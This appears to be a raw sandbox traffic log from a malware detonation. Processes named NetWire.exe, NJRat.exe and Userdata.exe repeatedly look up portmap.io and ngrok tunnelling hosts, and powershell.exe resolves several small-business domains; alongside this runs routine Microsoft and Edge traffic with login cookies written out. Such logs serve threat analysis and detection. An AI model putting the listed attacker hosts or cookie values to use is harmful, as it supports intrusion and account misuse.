40.126.32.133:443

Request

GET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=71d0bb3f-38dd-4863-8639-f364e971946a&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22C6B6495D728647ADA3098FCFDAE1CBA9%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: 1fc60d75-0fa9-42fb-9579-d2df53ce0d00
x-ms-ests-server: 2.1.20262.3 - WEULR1 ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
x-ms-srs: 1.P
referrer-policy: strict-origin-when-cross-origin
content-security-policy-report-only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-30y3FyMlWhoRhM8L13EQRw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
x-xss-protection: 0
set-cookie: buid=1.AXkAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAB5AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEQD0l1AWWwHQ0gW8q0qFamO2JlSSWyCZ58IAWXO9HmaCO5M6ShyPkidx2CEzKXhUe2SUh_au6RhbW1G196VcA4JYdsqPOH3iPct4e1ifIGmsgAA; expires=Fri, 11-Apr-2025 02:37:03 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=AppgaIrVoQ9BvxI8Q9Rsna-CeMQLAQAAAE_qYt8OAAAA; expires=Fri, 11-Apr-2025 02:37:03 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEECCr2xZN0gGme_P7gP2jj5ya4w4s20Y4QAFY6hL2KcDdwsyAZpeO-9K_3vV-2upZ9CL_kcwJ0344KuLRsNQ0oUpKtFFgJjG0jGoIzWRmHbjTCQOdO7qTISSgocHe2QWxDcdLzuX1pBUhKKXIKuhs6hnpLiidbFaE-WIHcE2PiQkgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
set-cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
date: Wed, 12 Mar 2025 02:37:03 GMT
content-length: 696
DNS

drive.usercontent.google.com

NetWire.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.187.193
DNS

drive.usercontent.google.com

NetWire.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.187.193
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

NJRat.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

officeclient.microsoft.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

officeclient.microsoft.com

IN A

Response

officeclient.microsoft.com

IN CNAME

config.officeapps.live.com

config.officeapps.live.com

IN CNAME

prod.configsvc1.live.com.akadns.net

prod.configsvc1.live.com.akadns.net

IN CNAME

europe.configsvc1.live.com.akadns.net

europe.configsvc1.live.com.akadns.net

IN CNAME

ukw-azsc-config.officeapps.live.com

ukw-azsc-config.officeapps.live.com

IN A

52.109.32.97
DNS

officeclient.microsoft.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

officeclient.microsoft.com

IN A

Response

officeclient.microsoft.com

IN CNAME

config.officeapps.live.com

config.officeapps.live.com

IN CNAME

prod.configsvc1.live.com.akadns.net

prod.configsvc1.live.com.akadns.net

IN CNAME

europe.configsvc1.live.com.akadns.net

europe.configsvc1.live.com.akadns.net

IN CNAME

weu-azsc-config.officeapps.live.com

weu-azsc-config.officeapps.live.com

IN A

52.109.89.18
DNS

roaming.officeapps.live.com

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

neu-azsc-000.roaming.officeapps.live.com

neu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com

IN A

52.109.76.243
DNS

roaming.officeapps.live.com

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

roaming.officeapps.live.com

IN A

Response

roaming.officeapps.live.com

IN CNAME

prod.roaming1.live.com.akadns.net

prod.roaming1.live.com.akadns.net

IN CNAME

eur.roaming1.live.com.akadns.net

eur.roaming1.live.com.akadns.net

IN CNAME

weu-azsc-000.roaming.officeapps.live.com

weu-azsc-000.roaming.officeapps.live.com

IN CNAME

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com

IN A

52.109.89.19
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

WINWORD.EXE

Remote address:

52.109.76.243:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_361
X-OfficeVersion: 16.0.18702.30575
X-OfficeCluster: neu-000.roaming.officeapps.live.com
Content-Security-Policy-Report-Only: script-src 'nonce-bRkepfnazjBCXxTeYIBqwRoi1pgrpTux/7UjGAj1TDswUVK8hlIaoBMoN5ONShODlUTlLwJM2g1g9LzxxZLsA2LdeOwdJnt6KbsBOosGlkPH0PKgblkNuh08rcYcXYercIiPD2sEkdV6wHWpB6RHhEHmYb1H5wtYCNx00phQ86Q=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod; frame-ancestors 'none';
X-Frame-Options: Deny
X-CorrelationId: 5c4f4897-d227-4265-9816-0cd45ffd6c0b
X-Powered-By: ASP.NET
Date: Wed, 12 Mar 2025 02:38:36 GMT
Content-Length: 654
DNS

blockchainjoblist.com

powershell.exe

Remote address:

8.8.8.8:53

Request

blockchainjoblist.com

IN A

Response
DNS

blockchainjoblist.com

powershell.exe

Remote address:

8.8.8.8:53

Request

blockchainjoblist.com

IN A

Response
DNS

womenempowermentpakistan.com

powershell.exe

Remote address:

8.8.8.8:53

Request

womenempowermentpakistan.com

IN A

Response

womenempowermentpakistan.com

IN A

50.2.99.243
DNS

womenempowermentpakistan.com

powershell.exe

Remote address:

8.8.8.8:53

Request

womenempowermentpakistan.com

IN A

Response

womenempowermentpakistan.com

IN A

50.2.99.243
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

NJRat.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

0.tcp.ngrok.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.137.60.53
DNS

0.tcp.ngrok.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

0.tcp.ngrok.io

IN A

Response

0.tcp.ngrok.io

IN A

3.135.250.11
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

startitit2-23969.portmap.host

IN A

Response
DNS

atnimanvilla.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

atnimanvilla.com

IN A

Response

atnimanvilla.com

IN A

34.132.102.6

atnimanvilla.com

IN A

34.136.111.81
DNS

atnimanvilla.com

Userdata.exe

Remote address:

8.8.8.8:53

Request

atnimanvilla.com

IN A

Response

atnimanvilla.com

IN A

34.136.111.81

atnimanvilla.com

IN A

34.132.102.6
DNS

yeuquynhnhai.com

powershell.exe

Remote address:

8.8.8.8:53

Request

yeuquynhnhai.com

IN A

Response
DNS

deepikarai.com

powershell.exe

Remote address:

8.8.8.8:53

Request

deepikarai.com

IN A

Response

deepikarai.com

IN A

195.35.22.167
DNS

deepikarai.com

powershell.exe

Remote address:

8.8.8.8:53

Request

deepikarai.com

IN A

Response

deepikarai.com

IN A

195.35.22.167
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiMG1aRkNEeU1tSzA9Iiwia2V5IjoiYjBlVFA5eTZlWi9pelFnUkxubDFIZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1606
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:39:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoicThVZW0xMW1jeGM9Iiwia2V5IjoiMkJyeXhQcUYvZ0xkTGxrdnEyc1hoZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2006
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:39:16 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 854
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

http://www.towns.com/dorms/tom/bblboy.htm

msedge.exe

Remote address:

66.33.60.130:80

Request

GET /dorms/tom/bblboy.htm HTTP/1.1
Host: www.towns.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.0 308 Permanent Redirect

Content-Type: text/plain
Location: https://www.towns.com/dorms/tom/bblboy.htm
Refresh: 0;url=https://www.towns.com/dorms/tom/bblboy.htm
server: Vercel
GET

https://www.towns.com/dorms/tom/bblboy.htm

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /dorms/tom/bblboy.htm HTTP/2.0
host: www.towns.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 103

server: Vercel
x-vercel-id: g3JTWco9BHKqwESWlNdII5Bpcu5j2Vy8
GET

https://www.towns.com/_next/static/media/b0063d457f186698-s.p.woff2

msedge.exe

Remote address:

66.33.60.130:443

Response

HTTP/2.0 404

access-control-allow-origin: *
age: 2440359
cache-control: public, max-age=0, must-revalidate
content-disposition: inline; filename="404"
content-encoding: br
content-type: text/html; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"f82164548efe355c994789f7d265be87"
last-modified: Tue, 11 Feb 2025 20:46:37 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /404
x-vercel-cache: HIT
x-vercel-id: fra1::crt5m-1741747156758-9c2d0e26db90

Request

GET /_next/static/media/b0063d457f186698-s.p.woff2 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.towns.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.towns.com/_next/static/media/d6ff895bb8f0bde6-s.p.woff2

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/media/d6ff895bb8f0bde6-s.p.woff2 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.towns.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
age: 2441217
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="webpack-622281acff5cf72f.js"
content-encoding: br
content-type: application/javascript; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"e9931a175cd62f0a6f060ac03db40527"
last-modified: Tue, 11 Feb 2025 20:32:19 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/chunks/webpack-622281acff5cf72f.js
x-vercel-cache: HIT
x-vercel-id: fra1::crt5m-1741747156842-99488348110c
GET

https://www.towns.com/_next/static/chunks/webpack-622281acff5cf72f.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/chunks/webpack-622281acff5cf72f.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 2441192
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="b0063d457f186698-s.p.woff2"
content-type: font/woff2
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: "a7661a9f39e1db8b463f31a21eb08226"
last-modified: Tue, 11 Feb 2025 20:32:44 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/media/b0063d457f186698-s.p.woff2
x-vercel-cache: HIT
x-vercel-id: fra1::fc9wr-1741747156843-4500a4b2c30b
content-length: 74872
GET

https://www.towns.com/_next/static/css/ca31ac3167de7da4.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/css/ca31ac3167de7da4.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 2441192
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="d6ff895bb8f0bde6-s.p.woff2"
content-type: font/woff2
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: "3aebf587d98dcedf223632f862cd0673"
last-modified: Tue, 11 Feb 2025 20:32:44 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/media/d6ff895bb8f0bde6-s.p.woff2
x-vercel-cache: HIT
x-vercel-id: fra1::xh8q2-1741747156842-3718b682b6c4
content-length: 17292
GET

https://www.towns.com/_next/static/css/e83a26a56fe23abc.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/css/e83a26a56fe23abc.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 2441217
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="main-app-9a3720905815865a.js"
content-type: application/javascript; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: "7e6e025aa143d4c8a2dcf7483f54247d"
last-modified: Tue, 11 Feb 2025 20:32:19 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/chunks/main-app-9a3720905815865a.js
x-vercel-cache: HIT
x-vercel-id: fra1::5wzzw-1741747156849-ad369e4dcd5d
content-length: 476
GET

https://www.towns.com/_next/static/chunks/4bd1b696-2531fe6b72bfb0f4.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/chunks/4bd1b696-2531fe6b72bfb0f4.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
age: 2441293
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="ca31ac3167de7da4.css"
content-encoding: br
content-type: text/css; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"c27671df72a90831fb0de8a86f9bf298"
last-modified: Tue, 11 Feb 2025 20:31:03 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/css/ca31ac3167de7da4.css
x-vercel-cache: HIT
x-vercel-id: fra1::wrqn2-1741747156849-1055d02b896d
GET

https://www.towns.com/_next/static/chunks/1517-a2579655d5db4165.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/chunks/1517-a2579655d5db4165.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
age: 2441217
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="4bd1b696-2531fe6b72bfb0f4.js"
content-encoding: br
content-type: application/javascript; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"00903d36037a0fc7db66d480862bcaa2"
last-modified: Tue, 11 Feb 2025 20:32:19 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/chunks/4bd1b696-2531fe6b72bfb0f4.js
x-vercel-cache: HIT
x-vercel-id: fra1::sj4xk-1741747156849-fae3660a2242
GET

https://www.towns.com/_next/static/chunks/main-app-9a3720905815865a.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

msedge.exe

Remote address:

66.33.60.130:443

Request

GET /_next/static/chunks/main-app-9a3720905815865a.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7 HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
age: 2441293
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="e83a26a56fe23abc.css"
content-encoding: br
content-type: text/css; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"ae590d44abb66b382d7009229d0ccf98"
last-modified: Tue, 11 Feb 2025 20:31:03 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/css/e83a26a56fe23abc.css
x-vercel-cache: HIT
x-vercel-id: fra1::mjp25-1741747156849-5818da6daf79
GET

https://www.towns.com/favicon.png

msedge.exe

Remote address:

66.33.60.130:443

Response

HTTP/2.0 200

access-control-allow-origin: *
age: 2441217
cache-control: public,max-age=31536000,immutable
content-disposition: inline; filename="1517-a2579655d5db4165.js"
content-encoding: br
content-type: application/javascript; charset=utf-8
date: Wed, 12 Mar 2025 02:39:16 GMT
etag: W/"b8c435642c50fc8fc59fe89130b0fbf2"
last-modified: Tue, 11 Feb 2025 20:32:19 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /_next/static/chunks/1517-a2579655d5db4165.js
x-vercel-cache: HIT
x-vercel-id: fra1::h6jhw-1741747156849-a728f08da8eb

Request

GET /favicon.png HTTP/2.0
host: www.towns.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.towns.com/dorms/tom/bblboy.htm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

msedge.exe

Remote address:

66.33.60.130:443

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 2441199
cache-control: public, max-age=0, must-revalidate
content-disposition: inline; filename="favicon.png"
content-type: image/png
date: Wed, 12 Mar 2025 02:39:17 GMT
etag: "fc3facbb9c92c4b58bfa2f327bc9f0df"
last-modified: Tue, 11 Feb 2025 20:32:37 GMT
server: Vercel
strict-transport-security: max-age=63072000
x-matched-path: /favicon.png
x-vercel-cache: HIT
x-vercel-id: fra1::7dg4d-1741747157042-d08f0f66e37b
content-length: 1162
DNS

nickman12-46565.portmap.io

Userdata.exe

Remote address:

8.8.8.8:53

Request

nickman12-46565.portmap.io

IN A

Response
DNS

startitit2-23969.portmap.host

Userdata.exe

Remote address:

8.8.8.8:53

Request

